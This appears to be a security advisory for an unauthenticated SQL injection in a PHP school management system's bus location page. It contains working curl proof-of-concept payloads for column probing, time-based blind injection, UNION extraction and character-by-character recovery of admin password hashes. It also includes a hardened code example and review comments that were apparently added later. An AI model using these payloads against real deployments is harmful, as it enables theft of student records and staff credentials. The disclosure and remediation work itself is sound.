## https://sploitus.com/exploit?id=522F040F-3E67-59B4-8183-025C01D1A67B
# CVE-2026-XXXXX

## Unauthenticated SQL Injection in School Management System — Bus Location Endpoint

---

### Advisory Information

| Field | Value |
|-------|-------|
| **Ecosystem** | PHP |
| **Package/Product** | School Management System |
| **Affected Versions** | All versions through commit `6b6fae5` (main branch, 2026-06-28) |
| **Patched Versions** | None |
| **Severity** | **HIGH (CVSS 7.5)** |
| **CWE** | CWE-89 (SQL Injection) + CWE-306 (Missing Authentication) |
| **CVSS Vector** | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N |
| **Repository** | https://github.com/ProjectsAndPrograms/school-management-system |
| **Stars** | 189 ⭐ · 101 forks |

---

### Summary

The School Management System contains an unauthenticated SQL injection vulnerability in `student_panel/buslocation.php`. The `$_GET['bus_id']` parameter is concatenated directly into a SELECT query without `mysqli_real_escape_string()`, prepared statements, or `intval()`. The page performs no session validation, no authentication check, and no input sanitization, allowing any remote attacker to extract arbitrary data from the database including student records, staff credentials, and school configuration.

---

### Affected Component

| Field | Value |
|-------|-------|
| **Ecosystem** | PHP |
| **Package** | ProjectsAndPrograms/school-management-system |
| **Vendor** | ProjectsAndPrograms |
| **Affected Versions** | All |
| **Patched Versions** | None |
| **File** | `student_panel/buslocation.php`, lines 55-56 |
| **Commit** | `6b6fae5` (updated code from xss attack, 2026-06-28) |

---

### Description

The school management system provides a bus tracking feature for students. The `buslocation.php` page displays bus route stops based on a `bus_id` URL parameter. The page is accessible from the student panel but has no authentication whatsoever — anyone can access it directly.

**Vulnerable code (`student_panel/buslocation.php`, lines 55-56):**

```php
$sql = "SELECT * FROM bus_root WHERE bus_id='{$_GET['bus_id']}'";
$result = mysqli_query($conn, $sql);
```

The `$_GET['bus_id']` value is interpolated directly into the SQL string using PHP string interpolation (`{$_GET['bus_id']}`). There is no `mysqli_real_escape_string()`, no `intval()` cast, and no prepared statement. The file does not call `session_start()` or check any session variable — it only includes `../assets/config.php` for the database connection.

Note the commit message `"updated code from xss attack"` โ€” the project has been patched for XSS before, but SQL injection in the bus location endpoint was overlooked.
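The following is an added example, not code from the project or from the advisory author, showing the interpolated query above replaced by a hardened form: strict integer validation of `bus_id`, a prepared statement with the id bound as a parameter, and a session gate for the page. It assumes `$conn` is the `mysqli` handle provided by `../assets/config.php` and that the login page sets `$_SESSION['uid']` (both assumptions, taken from the advisory's description and suggested patch). Run from the command line it performs an offline self-check that shows the PoC-style inputs being rejected before any SQL is built.

```php
<?php
// Added example (not the project's code): hardened replacement for the
// query in student_panel/buslocation.php.
// Assumptions: $conn is the mysqli handle from ../assets/config.php and the
// login page sets $_SESSION['uid'].
declare(strict_types=1);

// Accept only a plain positive integer. Anything else (for example
// "1' OR SLEEP(5) -- ") yields null so the caller can refuse the request
// instead of silently coercing it with intval().
function validate_bus_id(?string $raw): ?int
{
    if ($raw === null) {
        return null;
    }
    $value = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $value === false ? null : $value;
}

// Prepared statement: the id is bound as an integer and never becomes part
// of the SQL text, so quoting tricks cannot alter the query.
function fetch_bus_stops(mysqli $conn, int $busId): array
{
    $stmt = $conn->prepare("SELECT * FROM bus_root WHERE bus_id = ?");
    $stmt->bind_param("i", $busId);
    $stmt->execute();
    $rows = $stmt->get_result()->fetch_all(MYSQLI_ASSOC);
    $stmt->close();
    return $rows;
}

// Session gate (addresses CWE-306): must run before any output is sent,
// because header() cannot redirect once the response body has started.
function require_student_session(): void
{
    if (session_status() === PHP_SESSION_NONE) {
        session_start();
    }
    if (!isset($_SESSION['uid'])) {
        header("Location: ../login.php");
        exit;
    }
}

if (PHP_SAPI === 'cli') {
    // Offline self-check with constructed inputs: valid ids pass, the
    // injection-shaped strings from the advisory are rejected.
    $constructed = [
        ["1",                          1],
        ["42",                         42],
        ["1' ORDER BY 3 -- ",          null],
        ["1' OR SLEEP(5) -- ",         null],
        ["-1' UNION SELECT 1,2,3 -- ", null],
        ["0",                          null],
        ["",                           null],
    ];
    foreach ($constructed as [$input, $expected]) {
        $got = validate_bus_id($input);
        printf("%-32s => %s\n", var_export($input, true), var_export($got, true));
        if ($got !== $expected) {
            fwrite(STDERR, "unexpected result for $input\n");
            exit(1);
        }
    }
    echo "all inputs handled as expected\n";
} else {
    require_student_session();
    require_once __DIR__ . '/../assets/config.php'; // provides $conn (assumed)
    $busId = validate_bus_id($_GET['bus_id'] ?? null);
    if ($busId === null) {
        http_response_code(400);
        exit('Invalid bus id');
    }
    foreach (fetch_bus_stops($conn, $busId) as $stop) {
        // Render each stop with htmlspecialchars() as the page did before.
        echo htmlspecialchars((string) ($stop['stop_name'] ?? ''), ENT_QUOTES, 'UTF-8'), "<br>";
    }
}
```

The column name `stop_name` in the render loop is a placeholder; the advisory does not list the columns of `bus_root`, and the prepared statement works regardless of them. Validation with `FILTER_VALIDATE_INT` rather than `intval()` is deliberate: `intval("1' OR SLEEP(5)")` returns `1` and the request would succeed silently, whereas rejecting it with a 400 makes probing visible in the web server logs.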

---

### Proof of Concept

**Environment:** School Management System deployed at `http://target/`.

**Step 1 — Determine column count (ORDER BY):**

```bash
# Find number of columns in bus_root table
curl -s "http://target/student_panel/buslocation.php?bus_id=1'+ORDER+BY+3+--+"
# If error → fewer than 3 columns
curl -s "http://target/student_panel/buslocation.php?bus_id=1'+ORDER+BY+2+--+"
# If OK → bus_root has 2+ columns
```

**Step 2 — Time-Based Blind SQL Injection (universal):**

```bash
time curl "http://target/student_panel/buslocation.php?bus_id=1'+OR+SLEEP(5)+--+"
# 5-second delay confirms SQL injection — no authentication required
```

**Step 3 — Extract database name via UNION:**

```bash
curl "http://target/student_panel/buslocation.php?bus_id=-1'+UNION+SELECT+DATABASE(),USER(),VERSION()+--+"
# Displays database name, MySQL user, and version in the bus stop output
```

**Step 4 — Extract admin credentials (time-based blind):**

```bash
# Extract first character of admin password
time curl "http://target/student_panel/buslocation.php?bus_id=1'+OR+IF(ASCII(SUBSTRING((SELECT+password+FROM+admins+LIMIT+1),1,1))=36,SLEEP(5),0)+--+"
# 5s delay = first char is '$' (ASCII 36)
# Iterate through all positions to rebuild full admin password hash
```

**What makes this critical:**
1. No authentication — the page is directly accessible to anyone
2. No input sanitization — `$_GET['bus_id']` goes directly into SQL
3. The page returns visible output — enabling UNION-based data extraction
4. 189 stars + 101 forks on GitHub — deployed in real schools

---

### Impact

| CIA | Level | Description |
|-----|-------|-------------|
| Confidentiality | **HIGH** | Extract student records, staff credentials, admin password hashes, school configuration via UNION SELECT |
| Integrity | **NONE** | SELECT-only query in this endpoint; no INSERT/UPDATE/DELETE |
| Availability | **NONE** | No denial-of-service impact |

**Attack scenario:**
1. Attacker discovers the school management system URL
2. Attacker accesses `buslocation.php?bus_id=1'+OR+SLEEP(5)+--+` directly — no login needed
3. Time-based delay confirms SQL injection is exploitable
4. Attacker uses UNION SELECT to extract admin credentials from the database
5. With admin credentials, attacker gains full administrative access to student records, grades, and school data

---

### Patches

Gate the page behind a session check and cast the `bus_id` parameter with `intval()` (it is expected to be an integer):

```diff
+ session_start();
+ if (!isset($_SESSION['uid'])) {
+     header("Location: ../login.php");
+     exit;
+ }
- $sql = "SELECT * FROM bus_root WHERE bus_id='{$_GET['bus_id']}'";
+ $bus_id = intval($_GET['bus_id']);
+ $sql = "SELECT * FROM bus_root WHERE bus_id='$bus_id'";
```
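Review bot: the hunk places the removed query line after the added `session_start()` block, which reads as one contiguous change, but the two edits belong at different places in the file: the session gate must sit at the top of `buslocation.php` before any output (otherwise `header("Location: ...")` has no effect), while the query change applies at lines 55-56. Split this into two hunks. Two further points on the query lines: `intval($_GET['bus_id'])` emits an undefined array key warning when the parameter is absent (use `$_GET['bus_id'] ?? 0` or reject the request), and `bus_id='$bus_id'` still builds the SQL text by concatenation even though the value is now numeric. A parameterized query removes the concatenation entirely and is the standard CWE-89 remediation:
`$stmt = $conn->prepare("SELECT * FROM bus_root WHERE bus_id = ?");`
`$stmt->bind_param("i", $bus_id);`
`$stmt->execute();`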

---

### Verification

```bash
git clone https://github.com/ProjectsAndPrograms/school-management-system
cd school-management-system
git checkout 6b6fae5

# 1. Confirm raw $_GET in SQL:
grep -n '\$_GET.*bus_id' student_panel/buslocation.php
# Output: 55: $sql = "SELECT * FROM bus_root WHERE bus_id='{$_GET['bus_id']}'";

# 2. Verify NO escaping or prepared statement:
grep -c 'real_escape\|intval\|prepare' student_panel/buslocation.php
# Output: 0

# 3. Verify NO authentication:
grep -c 'session_start\|_SESSION\|verifyRole' student_panel/buslocation.php
# Output: 0

# 4. Verify CWE-306 — no auth gate on any student panel bus page:
grep -c 'verifyRole\|session_start' student_panel/bus*.php
# Output: 0 — buslocation.php and buspanel.php both have zero auth
```

**Verification status: ✅ ALL CHECKS PASSED**

---

### References

| Type | URL |
|------|-----|
| Repository | https://github.com/ProjectsAndPrograms/school-management-system |
| Vulnerable code | https://github.com/ProjectsAndPrograms/school-management-system/blob/master/student_panel/buslocation.php#L55 |
| CWE-89 | https://cwe.mitre.org/data/definitions/89.html |
| CWE-306 | https://cwe.mitre.org/data/definitions/306.html |

---

### Credits

| Role | Name |
|------|------|
| **Finder** | Fatullayev Asadbek |
| **Reporter** | Fatullayev Asadbek |
| **GitHub** | Kimdir01 |

---

### Timeline

| Date | Event |
|------|-------|
| 2026-06-28 | Vulnerability discovered via source code analysis |
| 2026-06-28 | Local verification — no auth + raw SQL confirmed |
| 2026-06-28 | Vendor notified + CVE ID requested via GitHub Security Advisory |
| TBD | Vendor acknowledgment / response |
| TBD + 90 days | Coordinated public disclosure |

---

### CVSS v3.1

```
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N — 7.5 HIGH

AV:N — Remote over HTTP (direct URL access)
AC:L — Simple HTTP GET, no special conditions
PR:N — No authentication required (zero session checks on the page)
UI:N — No user interaction
S:U  — Same security context
C:H  — Extract any database table via UNION SELECT or blind subquery
I:N  — SELECT-only query in buslocation.php
A:N  — No destructive capability via this endpoint
```